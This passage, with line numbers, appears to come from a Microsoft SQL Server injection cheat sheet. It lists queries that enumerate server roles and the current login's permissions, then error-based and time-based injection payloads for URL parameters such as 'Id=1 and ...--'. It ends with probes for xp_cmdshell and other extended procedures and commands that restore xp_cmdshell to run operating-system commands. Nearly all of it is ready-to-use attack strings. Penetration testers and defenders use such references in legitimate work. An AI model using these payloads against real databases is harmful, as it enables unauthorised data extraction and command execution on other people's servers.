849SELECT name FROM master..syslogins WHERE diskadmin = 1;
850SELECT name FROM master..syslogins WHERE dbcreator = 1;
851SELECT name FROM master..syslogins WHERE bulkadmin = 1;
852
853# Currently owned permissions
854SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); -- current database
855SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); -- current server
856SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); -- permissions on a table
857SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');
858
859# Error-based injection
860# Direct comparison with numbers
861Id=1 and @@version>0--
862Id=1 and user>0--
863Id=1 and db_name()>0--
864
865# Integer conversion error; can be used to reveal the database name, table name, or data
866Id=1 and 1=convert(int,(select name from master.dbo.sysdatabases where dbid=7))--
867
868
869Id=13 having 1=1 --
870Id=13 group by table name. field name 1, field name 2 having 1 = 1 --
871IF(ascii(SUBSTRING('name',1,1))>0) waitfor delay'0:0:3'
872
873# Command execution
874
875And select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
876And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread') #registry
877And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask') #backup
878And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc') #restore extension
879And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs') #Read subdirectory
880And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree') #list directory
881
882# Restore and remove xp_cmdshell
883Exec sp_addextendedproc xp_cmdshell, 'xplog70.dll'
884Exec sp_dropextendedproc 'xp_cmdshell'